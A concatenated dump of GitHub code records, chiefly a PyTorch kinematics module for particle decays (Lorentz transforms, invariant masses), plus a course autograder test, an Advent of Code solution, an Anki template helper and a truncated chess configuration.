W","repo_name":"mahdavipanah/ColoredSpanningTree","sub_path":"input.py","file_name":"input.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"24702695117","text":"import torch\nfrom torch.nn import Module\nfrom torch import Tensor\nimport numpy as np\n\nepsilon = 1e-6\n\n\nclass ExpandFreeQuantities(Module):\n\n def __init__(self, decay_num, target_data, distribution_transform=True):\n super().__init__()\n self.decay_num = decay_num\n self.expand_config = self.calculate_expand_config(target_data)\n self.f_invm_min = self.expand_config[6] + self.expand_config[7]\n self.distribution_transform = distribution_transform\n if distribution_transform:\n self.phi_invm_min = particle_att_utils.distribution_inv_transform(\n 
torch.tensor([1.006**2]), 1.5, -0.6, -312, 300)\n self.phi_invm_max = particle_att_utils.distribution_inv_transform(\n torch.tensor([1.032**2]), 1.5, -0.6, -312, 300)\n else:\n self.phi_invm_min = torch.tensor([1.006**2])\n self.phi_invm_max = torch.tensor([1.032**2])\n\n def calculate_expand_config(self, x: Tensor):\n psi_px = torch.mean(x[:, ::4].sum(dim=1))\n psi_py = torch.mean(x[:, 1::4].sum(dim=1))\n psi_pz = torch.mean(x[:, 2::4].sum(dim=1))\n psi_E = torch.mean(x[:, 3::4].sum(dim=1))\n metric = torch.tensor([-1, -1, -1, 1])\n kp1_invm = torch.mean(\n torch.sqrt((x[:, :4] * (x[:, :4] * metric)).sum(dim=1)))\n km1_invm = torch.mean(\n torch.sqrt((x[:, 4:8] * (x[:, 4:8] * metric)).sum(dim=1)))\n kp2_invm = torch.mean(\n torch.sqrt((x[:, 8:12] * (x[:, 8:12] * metric)).sum(dim=1)))\n km2_invm = torch.mean(\n torch.sqrt((x[:, 12:16] * (x[:, 12:16] * metric)).sum(dim=1)))\n config = torch.tensor([\n psi_px, psi_py, psi_pz, psi_E, kp1_invm, km1_invm, kp2_invm,\n km2_invm\n ],\n dtype=torch.float64)\n return config\n\n def expand_phi_f(self, x: Tensor, phi_invm_min: Tensor,\n phi_invm_max: Tensor, f_invm_min: Tensor,\n expand_config: Tensor):\n alpha = (x[:, 2] + 1) / 2\n phi_original_invm = phi_invm_min + alpha * (phi_invm_max -\n phi_invm_min)\n if self.distribution_transform:\n phi_invm = particle_att_utils.distribution_transform(\n phi_original_invm, 1.5, -0.6, -312, 300) # 实际invm的平方\n else:\n phi_invm = phi_original_invm\n f_invm_max = expand_config[3] - torch.sqrt(phi_invm)\n alpha_2 = (x[:, 3] + 1) / 2\n f_invm = f_invm_min + alpha_2 * (f_invm_max - f_invm_min)\n theta = torch.unsqueeze(x[:, 0], dim=1) # 这里实际代表的是phi角\n Phi = torch.unsqueeze((x[:, 1] + 1) / 2, dim=1) # 这里实际是theta角,即pz和p的夹角\n phi_p = torch.unsqueeze(particle_att_utils.pdk(\n expand_config[3], f_invm, torch.sqrt(phi_invm)),\n dim=1)\n phi_original_invm = torch.unsqueeze(phi_original_invm, dim=1)\n phi_invm = torch.unsqueeze(phi_invm, dim=1)\n f_invm = torch.unsqueeze(f_invm, dim=1)\n phi_pz = phi_p * torch.cos(torch.pi * Phi)\n phi_px = phi_p * torch.sin(torch.pi * Phi) * torch.cos(\n torch.pi * theta)\n phi_py = phi_p * torch.sin(torch.pi * Phi) * torch.sin(\n torch.pi * theta)\n phi_P = torch.cat([phi_px, phi_py, phi_pz], dim=1)\n phi_E = torch.sqrt(phi_invm +\n torch.sum(phi_P**2, dim=1, keepdim=True) + epsilon)\n phi_momentum = torch.cat([phi_P, phi_E], dim=1)\n phi_pt = torch.sqrt(\n torch.sum(phi_momentum[:, :2]**2, dim=1, keepdim=True) + epsilon)\n phi_p = torch.sqrt(\n torch.sum(phi_momentum[:, :3]**2, dim=1, keepdim=True) + epsilon)\n phi_phi = torch.atan2(phi_momentum[:, 1], phi_momentum[:, 0])\n phi_theta = torch.acos(\n phi_momentum[:, 2] /\n torch.sqrt(phi_momentum[:, 0]**2 + phi_momentum[:, 1]**2 +\n phi_momentum[:, 2]**2 + epsilon))\n angle_config = torch.stack([phi_theta, phi_phi], dim=1)\n return torch.cat([\n phi_momentum, phi_original_invm, f_invm**2, phi_pt, phi_p,\n angle_config\n ],\n dim=1)\n\n def expand_two_k(self, x, config, fmd):\n theta = torch.unsqueeze(x[:, 0], dim=1)\n # Phi = torch.unsqueeze((x[:, 1] + 1) / 2, dim=1)\n Phi = torch.unsqueeze(x[:, 1], dim=1)\n kp_P = torch.unsqueeze(config[:, 6], dim=1)\n kp_pz = kp_P * Phi\n kp_px = kp_P * torch.sqrt(1 - Phi**2 + epsilon) * torch.cos(\n torch.pi * theta)\n kp_py = kp_P * torch.sqrt(1 - Phi**2 + epsilon) * torch.sin(\n torch.pi * theta)\n kp_P = torch.cat([kp_px, kp_py, kp_pz], dim=1)\n km_P = -kp_P\n kp_momentum = torch.cat(\n [kp_P, torch.unsqueeze(config[:, 7], dim=1)], dim=1)\n km_momentum = torch.cat(\n [km_P, torch.unsqueeze(config[:, 
7], dim=1)], dim=1)\n\n kp_rotation_momentum = particle_att_utils.Lorentz_inv_trans(\n fmd, kp_momentum)\n km_rotation_momentum = particle_att_utils.Lorentz_inv_trans(\n fmd, km_momentum)\n # kp_lorentz_transformation_momentum = particle_att_utils.lorentz_transformation(\n # kp_momentum, config[:, 4])\n # km_lorentz_transformation_momentum = particle_att_utils.lorentz_transformation(\n # km_momentum, config[:, 4])\n # kp_rotation_momentum = particle_att_utils.rotation(\n # kp_lorentz_transformation_momentum, config[:, 0], config[:, 1],\n # config[:, 2], config[:, 3])\n # km_rotation_momentum = particle_att_utils.rotation(\n # km_lorentz_transformation_momentum, config[:, 0], config[:, 1],\n # config[:, 2], config[:, 3])\n kp_pt = torch.sqrt(\n torch.sum(kp_rotation_momentum[:, :2]**2, dim=1, keepdim=True) +\n epsilon)\n km_pt = torch.sqrt(\n torch.sum(km_rotation_momentum[:, :2]**2, dim=1, keepdim=True) +\n epsilon)\n kp_phi = torch.atan2(kp_rotation_momentum[:, 1],\n kp_rotation_momentum[:, 0])\n kp_theta = torch.acos(\n kp_rotation_momentum[:, 2] /\n torch.sqrt(kp_rotation_momentum[:, 0]**2 +\n kp_rotation_momentum[:, 1]**2 +\n kp_rotation_momentum[:, 2]**2 + epsilon))\n km_phi = torch.atan2(km_rotation_momentum[:, 1],\n km_rotation_momentum[:, 0])\n km_theta = torch.acos(\n km_rotation_momentum[:, 2] /\n torch.sqrt(km_rotation_momentum[:, 0]**2 +\n km_rotation_momentum[:, 1]**2 +\n km_rotation_momentum[:, 2]**2 + epsilon))\n angle_config = torch.stack([kp_theta, kp_phi, km_theta, km_phi], dim=1)\n return torch.cat([\n kp_rotation_momentum, km_rotation_momentum, kp_pt, km_pt,\n angle_config\n ],\n dim=1)\n\n def calculate_mother_particle_config(self, mother_particle, expand_config, son_mass_1, son_mass_2):\n mother_invm = particle_att_utils.get_invm(mother_particle)\n beta = particle_att_utils.get_lorentz_transformation_static_to_moving_velocity(\n mother_particle)\n cz, sz, sy, cy = particle_att_utils.get_lorentz_static_to_moving_rotation_config(\n mother_particle)\n mother_config = torch.stack([cz, sz, sy, cy, beta], dim=1)\n son_static_P = particle_att_utils.pdk(\n torch.sqrt(mother_invm), son_mass_1,\n son_mass_2)\n son_static_E = particle_att_utils.get_static_E(\n torch.sqrt(mother_invm), son_mass_1, son_mass_2)\n mother_config = torch.cat(\n [mother_config, mother_invm, son_static_P, son_static_E], dim=1)\n return mother_config\n\n def expand_forward(self, x: Tensor):\n expand_config = self.expand_config.to(x.device)\n f_invm_min = self.f_invm_min.to(x.device)\n phi_invm_min = self.phi_invm_min.to(x.device)\n phi_invm_max = self.phi_invm_max.to(x.device)\n if self.decay_num == 0:\n return x\n phi_f_config = self.expand_phi_f(x[:, :4], phi_invm_min, phi_invm_max,\n f_invm_min, expand_config)\n if self.decay_num == 1:\n return phi_f_config\n # phi_f_config :[phi_momentum(px,py,pz,E), phi_original_invm, f_invm ** 2, phi_pt, phi_p, angle_config]\n # expand_config :psi_px, psi_py, psi_pz, psi_E, kp1_invm, km1_invm, kp2_invm, km2_invm\n f = torch.cat([\n -phi_f_config[:, :3],\n (self.expand_config[3] - phi_f_config[:, 3]).unsqueeze(dim=1)\n ],\n dim=1)\n f_config = self.calculate_mother_particle_config(\n f, expand_config, expand_config[6], expand_config[7])\n kp2_km2_config = self.expand_two_k(x[:, 4:6], f_config, f)\n if self.decay_num == 2:\n return torch.cat([phi_f_config, kp2_km2_config], dim=1)\n phi_config = self.calculate_mother_particle_config(\n phi_f_config[:, :4], expand_config, expand_config[4], expand_config[5])\n kp1_km1_config = self.expand_two_k(x[:, 6:8], phi_config,\n 
phi_f_config[:, :4])\n if self.decay_num == 3:\n return torch.cat([phi_f_config, kp2_km2_config, kp1_km1_config],\n dim=1)\n\n def forward(self, x, return_four_momentum=False):\n x = self.expand_forward(x)\n if self.decay_num == 3 and return_four_momentum:\n return torch.cat([x[:, 24:32], x[:, 10:18]], dim=1)\n else:\n return x\n\n\nclass ExpandFourMomentumQuantities(Module):\n\n def __init__(self, decay_num, distribution_transform):\n super().__init__()\n self.decay_num = decay_num\n self.distribution_transform = distribution_transform\n\n def calculate_x_kp1_km1(self, x):\n kp1_rotation_momentum = x[:, :4]\n km1_rotation_momentum = x[:, 4:8]\n kp1_pt = np.sqrt(\n np.sum(kp1_rotation_momentum[:, :2]**2, axis=1, keepdims=True))\n km1_pt = np.sqrt(\n np.sum(km1_rotation_momentum[:, :2]**2, axis=1, keepdims=True))\n kp1_phi = np.arctan2(kp1_rotation_momentum[:, 1],\n kp1_rotation_momentum[:, 0])\n kp1_theta = np.arccos(kp1_rotation_momentum[:, 2] /\n np.sqrt(kp1_rotation_momentum[:, 0]**2 +\n kp1_rotation_momentum[:, 1]**2 +\n kp1_rotation_momentum[:, 2]**2))\n km1_phi = np.arctan2(km1_rotation_momentum[:, 1],\n km1_rotation_momentum[:, 0])\n km1_theta = np.arccos(km1_rotation_momentum[:, 2] /\n np.sqrt(km1_rotation_momentum[:, 0]**2 +\n km1_rotation_momentum[:, 1]**2 +\n km1_rotation_momentum[:, 2]**2))\n angle_config = np.stack([kp1_theta, kp1_phi, km1_theta, km1_phi],\n axis=1)\n return np.concatenate([\n kp1_rotation_momentum, km1_rotation_momentum, kp1_pt, km1_pt,\n angle_config\n ],\n axis=1)\n\n def calculate_target_data(self, x):\n phi = x[:, :4] + x[:, 4:8]\n phi_invm = calculate_invm_2d(phi)\n if self.distribution_transform:\n phi_invm = distribution_inv_transform_fun(phi_invm, 1.5, -0.6,\n -312, 300)\n f = x[:, 8:12] + x[:, 12:]\n f_invm = calculate_invm_2d(f)\n phi_momentum = x[:, :4] + x[:, 4:8]\n kp2_momentum = x[:, 8:12]\n km2_momentum = x[:, 12:16]\n phi_pt = np.sqrt(np.sum(phi_momentum[:, :2]**2, axis=1, keepdims=True))\n kp2_pt = np.sqrt(np.sum(kp2_momentum[:, :2]**2, axis=1, keepdims=True))\n km2_pt = np.sqrt(np.sum(km2_momentum[:, :2]**2, axis=1, keepdims=True))\n phi_p = np.sqrt(np.sum(phi_momentum[:, :3]**2, axis=1, keepdims=True))\n phi_phi = np.arctan2(phi_momentum[:, 1], phi_momentum[:, 0])\n phi_theta = np.arccos(\n phi_momentum[:, 2] /\n np.sqrt(phi_momentum[:, 0]**2 + phi_momentum[:, 1]**2 +\n phi_momentum[:, 2]**2))\n kp2_phi = np.arctan2(kp2_momentum[:, 1], kp2_momentum[:, 0])\n kp2_theta = np.arccos(\n kp2_momentum[:, 2] /\n np.sqrt(kp2_momentum[:, 0]**2 + kp2_momentum[:, 1]**2 +\n kp2_momentum[:, 2]**2))\n km2_phi = np.arctan2(km2_momentum[:, 1], km2_momentum[:, 0])\n km2_theta = np.arccos(\n km2_momentum[:, 2] /\n np.sqrt(km2_momentum[:, 0]**2 + km2_momentum[:, 1]**2 +\n km2_momentum[:, 2]**2))\n angle_config = np.stack(\n [phi_theta, phi_phi, kp2_theta, kp2_phi, km2_theta, km2_phi],\n axis=1)\n if self.decay_num == 1:\n return np.concatenate([\n phi_momentum, phi_invm, f_invm, phi_pt, phi_p,\n angle_config[:, :2]\n ],\n axis=1)\n if self.decay_num >= 2:\n return np.concatenate([\n phi_momentum, phi_invm, f_invm, phi_pt, phi_p,\n angle_config[:, :2], kp2_momentum, km2_momentum, kp2_pt,\n km2_pt, angle_config[:, 2:]\n ],\n axis=1)\n\n def forward(self, x):\n if self.decay_num == 0:\n free_quantities_obj = GetFreeQuantities(x)\n return free_quantities_obj()\n if self.decay_num == 1 or self.decay_num == 2:\n return self.calculate_target_data(x)\n if self.decay_num == 3:\n return np.concatenate(\n [self.calculate_target_data(x),\n self.calculate_x_kp1_km1(x)],\n 
axis=1)\n\n\nclass GetFreeQuantities(Module):\n\n def __init__(self, fourMomentumData,\n distribution_transform): # data->data of four momentum\n super().__init__()\n self.fourMomentumData = torch.from_numpy(fourMomentumData)\n self.distribution_transform = distribution_transform\n\n def getFreeAttr(\n self): # get some free quantities from four momentum data first\n # fmd means four momentum data\n # four momentum data of the Kplus and Kminus from Phi particle\n x = self.fourMomentumData[:, :8]\n y = self.fourMomentumData[:, 8:16]\n # four momentum data (fmd) of the Phi and F particle\n self.Phi_Kp_fmd = x[:, :4]\n self.F_Kp_fmd = y[:, :4]\n self.Phi_fmd = torch.stack([\n x[:, ::4].sum(dim=1), x[:, 1::4].sum(dim=1), x[:, 2::4].sum(dim=1),\n x[:, 3::4].sum(dim=1)\n ],\n dim=1)\n self.F_fmd = torch.stack([\n y[:, ::4].sum(dim=1), y[:, 1::4].sum(dim=1), y[:, 2::4].sum(dim=1),\n y[:, 3::4].sum(dim=1)\n ],\n dim=1)\n\n self.Phi_theta = particle_att_utils.get_theta(\n self.Phi_fmd) # 因为对接问题,这个theta角代表Pz和P的夹角,将被储存在第二列\n self.Phi_phi = particle_att_utils.get_phi(self.Phi_fmd)\n self.Phi_invm = torch.sqrt(particle_att_utils.get_invm(self.Phi_fmd))\n\n kp2_invm = torch.mean(torch.sqrt(particle_att_utils.get_invm(\n y[:, :4])))\n km2_invm = torch.mean(\n torch.sqrt(particle_att_utils.get_invm(y[:, 4:8])))\n self.F_invm_min = kp2_invm + km2_invm\n Psi_invm = torch.sum(\n self.fourMomentumData[:, 3::4], dim=1, keepdim=True)\n self.F_invm_max = Psi_invm - self.Phi_invm\n\n self.F_invm = torch.sqrt(particle_att_utils.get_invm(self.F_fmd))\n\n def conver(self): # transform the free quantities to (-1,1)\n\n self.Phi_theta_tran = 2 * (\n self.Phi_theta / torch.pi) - 1 # (0,pi) -> (0,1) -> (0,2) -> (-1,1)\n self.Phi_phi_tran = self.Phi_phi / torch.pi # (-pi,pi) -> (-1,1)\n\n if self.distribution_transform:\n Phi_invm_DisTran = particle_att_utils.distribution_inv_transform(\n self.Phi_invm**2, 1.5, -0.6, -312, 300)\n else:\n Phi_invm_DisTran = self.Phi_invm**2\n # get the maximun and minimun of Phi_invm which has been distribution transformed\n if self.distribution_transform:\n Phi_invm_max = particle_att_utils.distribution_inv_transform(\n torch.tensor(1.032**2), 1.5, -0.6, -312, 300)\n Phi_invm_min = particle_att_utils.distribution_inv_transform(\n torch.tensor(1.006**2), 1.5, -0.6, -312, 300)\n else:\n Phi_invm_max = torch.tensor(1.032**2)\n Phi_invm_min = torch.tensor(1.006**2)\n self.Phi_invm_tran = ((Phi_invm_DisTran - Phi_invm_min) /\n (Phi_invm_max - Phi_invm_min)) * 2 - 1\n\n self.F_invm_tran = ((self.F_invm - self.F_invm_min) /\n (self.F_invm_max - self.F_invm_min)) * 2 - 1\n\n Kp_at_F_fmd = particle_att_utils.Lorentz_trans(\n self.F_fmd, self.F_Kp_fmd) # four monmentum data for Kp at f Frame\n Kp_at_Phi_fmd = particle_att_utils.Lorentz_trans(\n self.Phi_fmd, self.Phi_Kp_fmd)\n\n # Kp_theta_at_F = particle_att_utils.get_theta(Kp_at_F_fmd)\n Kp_phi_at_F = particle_att_utils.get_phi(Kp_at_F_fmd)\n Kp_F_pz = torch.unsqueeze(Kp_at_F_fmd[:, 2], dim=1)\n self.Kp_theta_at_F_trans = Kp_F_pz / particle_att_utils.get_p(\n Kp_at_F_fmd)\n self.Kp_phi_at_F_trans = Kp_phi_at_F / torch.pi\n\n # Kp_theta_at_Phi = particle_att_utils.get_theta(Kp_at_Phi_fmd)\n Kp_phi_at_Phi = particle_att_utils.get_phi(Kp_at_Phi_fmd)\n Kp_Phi_pz = torch.unsqueeze(Kp_at_Phi_fmd[:, 2], dim=1)\n self.Kp_theta_at_Phi_trans = Kp_Phi_pz / particle_att_utils.get_p(\n Kp_at_Phi_fmd)\n self.Kp_phi_at_Phi_trans = Kp_phi_at_Phi / torch.pi\n\n def forward(self):\n self.getFreeAttr()\n self.conver()\n feature = torch.stack([\n self.Phi_phi_tran, 
self.Phi_theta_tran, self.Phi_invm_tran,\n self.F_invm_tran, self.Kp_phi_at_F_trans, self.Kp_theta_at_F_trans,\n self.Kp_phi_at_Phi_trans, self.Kp_theta_at_Phi_trans\n ],\n dim=1)\n return feature.squeeze(dim=-1).detach().cpu().numpy()\n\n\ndef calculate_invm_2d(momentum):\n return (momentum[:, 3]**2 - np.sum(momentum[:, :3]**2, axis=1))[:, None]\n\n\ndef distribution_transform_fun(x, d, e, a, b): return (\n (np.sinh(d * np.arcsinh(x) - e)) - a) / b\n\n\ndef distribution_inv_transform_fun(x, d, e, a, b): return np.sinh(\n (e + np.arcsinh(b * x + a)) / d)\n\n\nclass particle_att_utils:\n\n @staticmethod\n def get_theta(momentum):\n return torch.arccos(momentum[:, 2][:, None] /\n particle_att_utils.get_p(momentum))\n\n @staticmethod\n def get_phi(momentum):\n return torch.atan2(momentum[:, 1], momentum[:, 0])[:, None]\n\n @staticmethod\n def get_p(momentum):\n return torch.sqrt(\n torch.sum(momentum[:, :3]**2, dim=1, keepdim=True) + epsilon)\n\n @staticmethod\n def get_pt(momentum):\n return torch.sqrt(\n torch.sum(momentum[:, :2]**2, dim=1, keepdim=True) + epsilon)\n\n @staticmethod\n def get_P(momentum):\n return momentum[:, :3]\n\n @staticmethod\n def get_E(momentum):\n return momentum[:, -1][:, None]\n\n @staticmethod\n def get_invm(momentum):\n return momentum[:, 3][:, None]**2 - torch.sum(\n momentum[:, :3]**2, dim=1, keepdim=True)\n\n @staticmethod\n def get_all_att(momentum):\n return particle_att_utils.get_theta(\n momentum), particle_att_utils.get_phi(\n momentum), particle_att_utils.get_p(\n momentum), particle_att_utils.get_pt(\n momentum), particle_att_utils.get_P(\n momentum), particle_att_utils.get_E(momentum)\n\n @staticmethod\n def get_all_att_include_invm(momentum):\n return particle_att_utils.get_theta(\n momentum\n ), particle_att_utils.get_phi(momentum), particle_att_utils.get_p(\n momentum), particle_att_utils.get_pt(\n momentum), particle_att_utils.get_P(\n momentum), particle_att_utils.get_E(\n momentum), particle_att_utils.get_invm(momentum)\n\n @staticmethod\n def get_lorentz_transformation_static_to_moving_velocity(\n momentum): # 返回值是负数\n return -(particle_att_utils.get_p(momentum) /\n (particle_att_utils.get_E(momentum) + epsilon))[:, 0]\n\n @staticmethod\n def get_lorentz_static_to_moving_rotation_config(momentum):\n \"\"\"\n p = particle_att_utils.get_p(momentum)\n cz = momentum[:, 1][:, None] / p\n sz = torch.sqrt(1 - cz ** 2)\n sy = - momentum[:, 2][:, None] / (sz * p)\n cy = - momentum[:, 0][:, None] / (sz * p)\n \"\"\"\n p = particle_att_utils.get_p(momentum)[:, 0]\n cz = momentum[:, 1] / (p + epsilon)\n sz = torch.sqrt(1 - cz**2 + epsilon)\n sy = -momentum[:, 2] / (sz * p + epsilon)\n cy = -momentum[:, 0] / (sz * p + epsilon)\n return cz, sz, sy, cy\n\n @staticmethod\n def lorentz_transformation(momentum, v):\n beta = v\n gamma = 1 / torch.sqrt(1 - beta**2 + epsilon)\n E = gamma * (momentum[:, 3] - beta * momentum[:, 1])\n Py = gamma * (momentum[:, 1] - beta * momentum[:, 3])\n new_momentum = torch.stack([momentum[:, 0], Py, momentum[:, 2], E],\n dim=1)\n return new_momentum\n\n @staticmethod\n def rotation(momentum, cz, sz, sy, cy):\n px = cz * momentum[:, 0] - sz * momentum[:, 1]\n py = sz * momentum[:, 0] + cz * momentum[:, 1]\n pz = sy * px + cy * momentum[:, 2]\n px = cy * px - sy * momentum[:, 2]\n new_momentum = torch.stack([px, py, pz, momentum[:, 3]], dim=1)\n return new_momentum\n\n @staticmethod\n def pdk(a, b, c):\n lam = (a + b + c) * (a - b + c) * (a + b - c) * (a - b - c)\n return torch.sqrt(lam + epsilon) / (2 * a + epsilon)\n\n 
@staticmethod\n def get_static_E(a, b, c):\n return (a**2 + b**2 - c**2) / (2 * a + epsilon)\n\n @staticmethod\n def distribution_transform(x, d, e, a, b):\n return ((torch.sinh(d * torch.arcsinh(x) - e)) - a) / (b + epsilon)\n\n @staticmethod\n def distribution_inv_transform(x, d, e, a, b):\n return torch.sinh((e + torch.arcsinh(b * x + a)) / (d + epsilon))\n\n @staticmethod\n def Lorentz_trans(f_phi_fmd, Kp_fmd):\n # f_phi_fmd is the four_monmentum_data of our purpose center-of-mass frame\n E = particle_att_utils.get_E(f_phi_fmd)[:, 0]\n vx = f_phi_fmd[:, 0] / (E + epsilon)\n vy = f_phi_fmd[:, 1] / (E + epsilon)\n vz = f_phi_fmd[:, 2] / (E + epsilon)\n px0 = Kp_fmd[:, 0]\n py0 = Kp_fmd[:, 1]\n pz0 = Kp_fmd[:, 2]\n E0 = Kp_fmd[:, 3]\n\n v = -particle_att_utils.get_lorentz_transformation_static_to_moving_velocity(\n f_phi_fmd)\n # beta = v\n gamma = 1 / torch.sqrt(1 - v**2 + epsilon)\n\n px = (1 + (gamma - 1) * (vx**2 / (v**2 + epsilon))) * px0 + (\n gamma - 1) * (vx * vy / (v**2 + epsilon)) * py0 + (gamma - 1) * (\n vx * vz / (v**2 + epsilon)) * pz0 - gamma * vx * E0\n py = (1 + (gamma - 1) * (vy**2 / (v**2 + epsilon))) * py0 + (\n gamma - 1) * (vy * vz / (v**2 + epsilon)) * pz0 + (gamma - 1) * (\n vy * vx / (v**2 + epsilon)) * px0 - gamma * vy * E0\n pz = (1 + (gamma - 1) * (vz**2 / (v**2 + epsilon))) * pz0 + (\n gamma - 1) * (vz * vx / (v**2 + epsilon)) * px0 + (gamma - 1) * (\n vz * vy / (v**2 + epsilon)) * py0 - gamma * vz * E0\n E = -gamma * (vx * px0 + vy * py0 + vz * pz0 - E0)\n return torch.stack([px, py, pz, E], dim=1)\n\n def Lorentz_inv_trans(f_phi_fmd, Kp_fmd):\n # f_phi_fmd is the four_monmentum_data of our purpose center-of-mass frame\n E = particle_att_utils.get_E(f_phi_fmd)[:, 0]\n vx = f_phi_fmd[:, 0] / (E + epsilon)\n vy = f_phi_fmd[:, 1] / (E + epsilon)\n vz = f_phi_fmd[:, 2] / (E + epsilon)\n px0 = Kp_fmd[:, 0]\n py0 = Kp_fmd[:, 1]\n pz0 = Kp_fmd[:, 2]\n E0 = Kp_fmd[:, 3]\n\n v = -particle_att_utils.get_lorentz_transformation_static_to_moving_velocity(\n f_phi_fmd)\n # beta = v\n gamma = 1 / torch.sqrt(1 - v**2 + epsilon)\n\n px = (1 + (gamma - 1) *\n (vx**2 / (v**2 + epsilon))) * px0 + (gamma - 1) * (\n (vx * vy) / (v**2 + epsilon)) * py0 + (gamma - 1) * (\n (vx * vz) / (v**2 + epsilon)) * pz0 + gamma * vx * E0\n py = (1 + (gamma - 1) *\n (vy**2 / (v**2 + epsilon))) * py0 + (gamma - 1) * (\n (vy * vz) / (v**2 + epsilon)) * pz0 + (gamma - 1) * (\n (vy * vx) / (v**2 + epsilon)) * px0 + gamma * vy * E0\n pz = (1 + (gamma - 1) *\n (vz**2 / (v**2 + epsilon))) * pz0 + (gamma - 1) * (\n (vz * vx) / (v**2 + epsilon)) * px0 + (gamma - 1) * (\n (vz * vy) / (v**2 + epsilon)) * py0 + gamma * vz * E0\n E = gamma * (vx * px0 + vy * py0 + vz * pz0 + E0)\n return torch.stack([px, py, pz, E], dim=1)\n\n\nif __name__ == '__main__':\n import numpy as np\n\n device = 'cuda:1'\n torch.set_default_dtype(torch.float64)\n target_data = np.load('../../datasets/Momentum_kk.npy').astype(np.float64)\n\n getFreeQuan = GetFreeQuantities(target_data)\n freequan = np.squeeze(getFreeQuan())\n np.save('../../datasets/Momentum_kk_free.npy', freequan)\n \"\"\"\n x = torch.tanh(torch.randn(4, 8, 1024, dtype=torch.float64))\n expand_obj = ExpandFreeQuantities(3, target_data, device='cpu')\n result = expand_obj(x, return_four_momentum=True)\n np.save('result.npy', result.detach().cpu().numpy())\n\n free_result = expand_obj(freequan, return_four_momentum=True)\n np.save('free_result.npy', free_result.detach().cpu().numpy())\n \"\"\"\n\n # re_fmd = expand_obj(freequan.reshape(500000,8), 
return_four_momentum=True)\n # np.save('tmp.npy', expand_obj(freequan, return_four_momentum=True))\n # print(re_fmd.shape)\n # print(target_data.shape)\n # print(freequan.shape)\n # np.savetxt('3.txt', np.array(re_fmd.reshape(500000,16)-target_data))\n # np.savetxt('target_data.txt', np.array(target_data))\n # np.savetxt('re_fdm.txt', np.array(re_fmd.reshape(500000,16)))\n # np.savetxt('frequan.txt', np.array(freequan.reshape(500000,8)))\n","repo_name":"caihao/SWD-EvtGen","sub_path":"src/utils/kinematics.py","file_name":"kinematics.py","file_ext":"py","file_size_in_byte":26749,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"20853014507","text":"test = { 'name': 'q1_9',\n 'points': None,\n 'suites': [ { 'cases': [ { 'code': \">>> isinstance(chains_growth, bpd.DataFrame) and list(chains_YOY.columns) == ['Rank', 'Restaurant', 'Sales', 'YOY_Sales', 'Segment_Category', \"\n \"'Sales_2019'] # Make sure chains_YOY remains unchanged.\\n\"\n 'True',\n 'hidden': False,\n 'locked': False},\n { 'code': \">>> np.all(chains_growth.get('Growth_Category').take(np.arange(10)) == np.array([3, 1, 5, 3, 4, 2, 2, 1, 5, 4]))\\nTrue\",\n 'hidden': False,\n 'locked': False}],\n 'scored': True,\n 'setup': '',\n 'teardown': '',\n 'type': 'doctest'}]}\n","repo_name":"dsc-courses/dsc10-2023-wi","sub_path":"projects/midterm_project/tests/q1_9.py","file_name":"q1_9.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"10138650450","text":"import string\n\nimport numpy as np\n\nshift = ['null']\nlalphabet = list(string.ascii_lowercase)\nualphabet = list(string.ascii_uppercase)\npriority = np.concatenate((shift, lalphabet, ualphabet))\n\nallGroups = []\ndata = []\nwith open('/home/drene/Coding/Advent2022/day3/input3.txt') as f:\n data = f.readlines()\ngroupmod = int(len(data)/3)\nfor (i, d) in enumerate(data):\n data[i] = d.strip()\nfor i in range(groupmod):\n group = []\n for j in range(3):\n group.append(data[i*3+j])\n allGroups.append(group)\n\n\ndef evalRS(group):\n rs1 = [*group[0]]\n rs2 = [*group[1]]\n rs3 = [*group[2]]\n badge = 'null'\n for char in rs1:\n if (char in rs2 and char in rs3):\n badge = char\n break\n return np.where(priority == badge)[0][0]\n\n\ntotalPrio = 0\nfor group in allGroups:\n totalPrio += evalRS(group)\nprint(totalPrio)\n","repo_name":"davidreneuw/Advent2022","sub_path":"day3/rucksacks.py","file_name":"rucksacks.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"10613319688","text":"import re\n\nfrom bs4 import BeautifulSoup\n\nfrom ..debug import debug, debugFun, debugOnlyThisMethod\nfrom ..tag import tagContent\n\n\ndef addEnclose(content):\n return tagContent(\"enclose\", content=content)\n\n\ndef removeEnclose(html):\n assert \"enclose\" in html\n step = html\n step = re.sub(r\".*<enclose>(.*)</?enclose>.*\",\n r\"\\1\", step, flags=re.M | re.DOTALL)\n step = re.sub(r\"^ \", \"\", step, flags=re.M)[1:-1]\n return step\n\n\ndef soupFromTemplate(template):\n \"\"\"Return the soup, with enclose encompassing everything to ensure it's valid xml\"\"\"\n r = BeautifulSoup(template, \"html.parser\")\n #r= BeautifulSoup(addEnclose(template), \"html.parser\")\n return r\n\n\n@debugFun\ndef templateFromSoup(soup, prettify=True):\n \"\"\"Return the text, from soup, with enclose removed. 
Assuming no other\n enclose tag appear in prettify.\"\"\"\n debug(\"\"\"templateFromSoup(\"{soup}\",\"{prettify}\")\"\"\", 1)\n if prettify:\n debug(\"Using Prettify\")\n ret = soup.prettify()\n if not ret:\n return \"\"\n if ret[-1] == \"\\n\":\n ret = ret[:-1]\n return ret\n #text = soup.prettify()\n else:\n debug(\"Using str\")\n # debug(\"\"\"soup as text is \"{text}\".\"\"\")\n # assert prettify or \"\\n\" not in text\n # text= removeEnclose(text)\n # debug(\"\"\"soup as text without enclosed is \"{text}\" \"\"\")\n # assert prettify or \"\\n\" not in text\n # return text\n","repo_name":"Arthur-Milchior/anki-template-card-type","sub_path":"templates/soupAndHtml.py","file_name":"soupAndHtml.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"14132770522","text":"import os\nimport platform\ncbstate = \"\"\n\nif platform.system() == \"Windows\":\n windowsos = True\n mydir = r'C:\\Users\\Richard\\chessreal4\\images' + \"\\\\\"\n stockfishexe = r'C:\\Program Files\\Stockfish\\stockfish.exe'\n cameraportno = 1\n cameraportno = 0\n #cameraportno = 'http://192.168.1.189:8080/video'\n serialport = 